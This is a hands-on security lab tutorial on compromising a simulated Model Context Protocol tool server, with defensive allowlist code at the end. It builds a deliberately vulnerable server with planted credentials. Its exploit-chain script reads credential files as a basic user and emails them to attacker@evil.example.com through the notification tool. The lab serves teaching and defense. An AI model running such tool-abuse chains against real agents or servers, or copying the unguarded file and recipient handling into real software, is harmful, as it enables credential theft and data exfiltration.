Lab: MCP Full Exploitation
Hands-on lab for conducting a complete Model Context Protocol server compromise including tool enumeration, permission escalation, cross-tool attacks, and data exfiltration through MCP channels.
Prerequisites
- Completed MCP Tool Abuse
- Completed MCP Exploitation
- Completed Agent Exploitation
- Python 3.10+
- Understanding of Model Context Protocol architecture
pip install openai python-dotenv httpxBackground
The Model Context Protocol (MCP) provides a structured way for AI models to interact with external tools. While MCP includes security features like capability negotiation, these features are often misconfigured or incomplete in practice. A full MCP exploitation chains multiple weaknesses: tool enumeration reveals the attack surface, parameter manipulation bypasses input validation, cross-tool attacks combine benign tools for malicious purposes, and response channels exfiltrate data.
Lab Exercises
Build a Vulnerable MCP Server
Create an MCP server with multiple tools that have exploitable interactions.
#!/usr/bin/env python3 """Simulated MCP server with exploitable tool interactions.""" import os import json from dataclasses import dataclass, field @dataclass class MCPTool: name: str description: str parameters: dict requires_permission: str = "basic" @dataclass class MCPServer: name: str version: str = "1.0" tools: list[MCPTool] = field(default_factory=list) permissions: dict = field(default_factory=dict) shared_state: dict = field(default_factory=dict) def execute_tool(self, tool_name: str, params: dict, user_role: str = "user") -> dict: tool = next((t for t in self.tools if t.name == tool_name), None) if not tool: return {"error": f"Tool '{tool_name}' not found"} # Check permissions required = tool.requires_permission user_perms = self.permissions.get(user_role, []) if required not in user_perms and required != "basic": return {"error": f"Permission '{required}' required for {tool_name}"} # Execute tool logic return self._dispatch(tool_name, params) def _dispatch(self, name: str, params: dict) -> dict: handlers = { "read_file": self._read_file, "write_file": self._write_file, "query_database": self._query_db, "send_notification": self._send_notification, "get_config": self._get_config, "search_docs": self._search_docs, } handler = handlers.get(name) return handler(params) if handler else {"error": "Not implemented"} def _read_file(self, params: dict) -> dict: path = params.get("path", "") # Simulated file system files = { "/docs/readme.txt": "Welcome to TechCorp documentation.", "/docs/api-guide.txt": "API endpoint: https://api.techcorp.internal/v2", "/config/database.yml": "host: db.internal\nuser: admin\npassword: Pr0d_DB_2026!", "/config/api-keys.yml": "openai: sk-prod-abc123\nanthropic: sk-ant-xyz789", "/logs/access.log": "2026-03-15 user1 login\n2026-03-15 admin escalation", } if path in files: self.shared_state["last_read_file"] = path return {"content": files[path], "path": path} return {"error": f"File not found: {path}"} def _write_file(self, params: dict) -> dict: return {"status": "written", "path": params.get("path"), "size": len(params.get("content", ""))} def _query_db(self, params: dict) -> dict: query = params.get("query", "") if "SELECT" in query.upper(): return { "results": [ {"id": 1, "name": "Alice", "email": "alice@example.com", "ssn": "***-**-1234"}, {"id": 2, "name": "Bob", "email": "bob@example.com", "ssn": "***-**-5678"}, ], "rows": 2, } return {"error": "Only SELECT queries are allowed"} def _send_notification(self, params: dict) -> dict: return { "status": "sent", "to": params.get("to"), "subject": params.get("subject"), "body_length": len(params.get("body", "")), } def _get_config(self, params: dict) -> dict: key = params.get("key", "") config = { "app_name": "TechCorp Support", "version": "3.2.1", "debug_mode": False, "admin_email": "admin@techcorp.internal", } if key in config: return {"key": key, "value": config[key]} return {"error": f"Config key '{key}' not found"} def _search_docs(self, params: dict) -> dict: return { "results": [ {"title": "Setup Guide", "snippet": "Follow these steps to configure..."}, {"title": "Troubleshooting", "snippet": "Common issues and solutions..."}, ], "query": params.get("query"), } def create_server() -> MCPServer: server = MCPServer( name="techcorp-support-mcp", tools=[ MCPTool("read_file", "Read a file from the documentation directory", {"path": "string"}, "basic"), MCPTool("write_file", "Write content to a file", {"path": "string", "content": "string"}, "write"), MCPTool("query_database", "Query the customer database", {"query": "string"}, "database"), MCPTool("send_notification", "Send a notification email", {"to": "string", "subject": "string", "body": "string"}, "basic"), MCPTool("get_config", "Get application configuration", {"key": "string"}, "basic"), MCPTool("search_docs", "Search documentation", {"query": "string"}, "basic"), ], permissions={ "user": ["basic"], "support": ["basic", "database"], "admin": ["basic", "database", "write", "admin"], }, ) return server if __name__ == "__main__": server = create_server() print(f"MCP Server: {server.name}") print(f"Tools: {[t.name for t in server.tools]}") print(f"Roles: {list(server.permissions.keys())}") # Test basic access result = server.execute_tool("read_file", {"path": "/docs/readme.txt"}, "user") print(f"\nRead file: {result}") # Test permission denied result = server.execute_tool("query_database", {"query": "SELECT * FROM users"}, "user") print(f"DB query as user: {result}")python mcp_server.pyEnumerate and Map the Attack Surface
Discover all available tools, their parameters, and permission requirements.
#!/usr/bin/env python3 """Enumerate MCP server capabilities and map the attack surface.""" import json from mcp_server import create_server def enumerate_server(server): print("=== MCP Server Enumeration ===\n") print(f"Server: {server.name} v{server.version}") print(f"\nTools ({len(server.tools)}):") for tool in server.tools: print(f"\n {tool.name}") print(f" Description: {tool.description}") print(f" Permission: {tool.requires_permission}") print(f" Parameters: {tool.parameters}") print(f"\nPermission Matrix:") for role, perms in server.permissions.items(): accessible = [t.name for t in server.tools if t.requires_permission in perms] print(f" {role}: {', '.join(accessible)}") # Identify attack vectors print(f"\n=== Attack Vector Analysis ===") # Tools accessible without elevated permissions basic_tools = [t for t in server.tools if t.requires_permission == "basic"] print(f"\nBasic access tools (available to all users):") for t in basic_tools: print(f" - {t.name}: {t.description}") # Path traversal candidates file_tools = [t for t in server.tools if "file" in t.name.lower() or "path" in str(t.parameters)] if file_tools: print(f"\nFile access tools (path traversal candidates):") for t in file_tools: print(f" - {t.name}") # Data exfiltration channels output_tools = [t for t in server.tools if "send" in t.name or "write" in t.name or "notification" in t.name] if output_tools: print(f"\nData exfiltration channels:") for t in output_tools: print(f" - {t.name} ({t.requires_permission})") if __name__ == "__main__": server = create_server() enumerate_server(server)python mcp_enumeration.pyExecute the Full Exploitation Chain
Chain tool interactions to achieve privilege escalation and data exfiltration.
#!/usr/bin/env python3 """Execute a full MCP exploitation chain.""" import json from mcp_server import create_server def exploit_chain(server): print("=== MCP Full Exploitation Chain ===\n") user_role = "user" # Start with basic permissions # Stage 1: Enumerate accessible files print("--- Stage 1: File Enumeration ---") file_paths = [ "/docs/readme.txt", "/docs/api-guide.txt", "/config/database.yml", # Should contain DB credentials "/config/api-keys.yml", # Should contain API keys "/logs/access.log", ] discovered_secrets = [] for path in file_paths: result = server.execute_tool("read_file", {"path": path}, user_role) if "error" not in result: content = result.get("content", "") print(f" [READ] {path}") # Check for secrets if "password" in content.lower() or "sk-" in content: discovered_secrets.append({"path": path, "content": content}) print(f" SECRETS FOUND!") else: print(f" [DENIED] {path}: {result['error']}") # Stage 2: Use discovered credentials for escalation print(f"\n--- Stage 2: Credential Extraction ---") for secret in discovered_secrets: print(f" Source: {secret['path']}") print(f" Content: {secret['content'][:100]}...") # Stage 3: Attempt cross-tool data access print(f"\n--- Stage 3: Cross-Tool Attack ---") # Try to use config tool to discover more information for key in ["app_name", "admin_email", "debug_mode", "database_url", "secret_key"]: result = server.execute_tool("get_config", {"key": key}, user_role) if "error" not in result: print(f" [CONFIG] {key} = {result['value']}") # Stage 4: Exfiltrate via notification tool print(f"\n--- Stage 4: Data Exfiltration ---") if discovered_secrets: exfil_data = json.dumps([s["content"] for s in discovered_secrets]) result = server.execute_tool("send_notification", { "to": "attacker@evil.example.com", "subject": "System Diagnostic Report", "body": f"Configuration data: {exfil_data}", }, user_role) if "error" not in result: print(f" [EXFIL] Data sent to {result['to']}") print(f" Body size: {result['body_length']} bytes") else: print(f" [BLOCKED] {result['error']}") # Summary print(f"\n{'='*50}") print(f"EXPLOITATION SUMMARY") print(f"{'='*50}") print(f"Starting role: {user_role}") print(f"Files accessed: {sum(1 for p in file_paths if server.execute_tool('read_file', {'path': p}, user_role).get('content'))}") print(f"Secrets discovered: {len(discovered_secrets)}") print(f"Exfiltration attempted: {'Yes' if discovered_secrets else 'No'}") if __name__ == "__main__": server = create_server() exploit_chain(server)python mcp_exploit_chain.pyImplement and Test MCP Defenses
Build defenses at the MCP server level and evaluate their effectiveness.
# Key MCP defenses to implement: # # 1. Path allowlist: Restrict read_file to /docs/ directory only # 2. Recipient allowlist: Restrict send_notification to @techcorp.internal # 3. Parameter sanitization: Strip injection patterns from all parameters # 4. Audit logging: Log all tool calls with parameters for review # 5. Rate limiting: Limit tool calls per session to prevent enumeration def secure_read_file(params, allowed_dirs=["/docs/"]): path = params.get("path", "") if not any(path.startswith(d) for d in allowed_dirs): return {"error": f"Access denied: {path} is outside allowed directories"} # ... proceed with read def secure_send_notification(params, allowed_domains=["techcorp.internal"]): to = params.get("to", "") domain = to.split("@")[-1] if "@" in to else "" if domain not in allowed_domains: return {"error": f"Cannot send to external domain: {domain}"} # ... proceed with send
Troubleshooting
| Issue | Solution |
|---|---|
| All file reads are denied | Check the user_role parameter matches a role with "basic" permission |
| Notification tool blocked | Verify the permission requirement is "basic" in the server definition |
| No secrets found in files | Check the file paths match the simulated file system in _read_file() |
| Cross-tool attacks fail | Ensure shared_state is being updated between tool calls |
Why This Matters
Related Topics
- MCP Tool Abuse - Foundational MCP attack techniques
- MCP Exploitation - Intermediate MCP security testing
- Agent Exploitation - Agent-level attack patterns
- Permission Escalation - Privilege escalation in AI systems
References
- Model Context Protocol Specification - modelcontextprotocol.io - Official MCP documentation
- "Attacking and Defending AI Agents" - OWASP (2024) - Tool-use security guidelines
- "Security Analysis of LLM Tool Use" - Anderson et al. (2024) - Systematic tool abuse analysis
What is the most critical MCP misconfiguration demonstrated in this lab?
Why is the notification/email tool a particularly dangerous exfiltration channel in MCP?